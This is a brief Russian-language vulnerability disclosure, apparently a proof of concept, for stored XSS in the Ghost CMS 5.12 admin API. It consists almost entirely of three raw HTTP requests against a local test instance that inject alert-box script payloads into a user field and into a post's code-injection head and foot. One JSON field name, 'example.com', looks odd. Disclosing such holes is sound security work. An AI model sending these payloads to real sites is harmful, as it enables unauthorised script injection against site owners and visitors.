XSS

В поле для users существует сохраненная XSS-уязвимость. (CVE-2022-47195/ CVE-2022-47194)

PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
Host: localhost:3001
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 104
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"users":[{"example.com":"</script><script>alert('XSS')</script>"}]}



В codeinjection_head для сообщения существует сохраненная XSS-уязвимость:

POST /ghost/api/admin/posts/ HTTP/1.1
Host: localhost:3001
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 144
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"posts":[{"title":"My Test Post",
"codeinjection_head":"<iframe onload=\"alert('XSS')\" />",
"authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}



В codeinjection_foot для сообщения существует сохраненная XSS-уязвимость:

POST /ghost/api/admin/posts/ HTTP/1.1
Host: localhost:3001
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 172
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"posts":[{"title":"My Test Post",
"codeinjection_head":null,
"codeinjection_foot":"<iframe onload=\"alert('XSS')\" />",
"authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}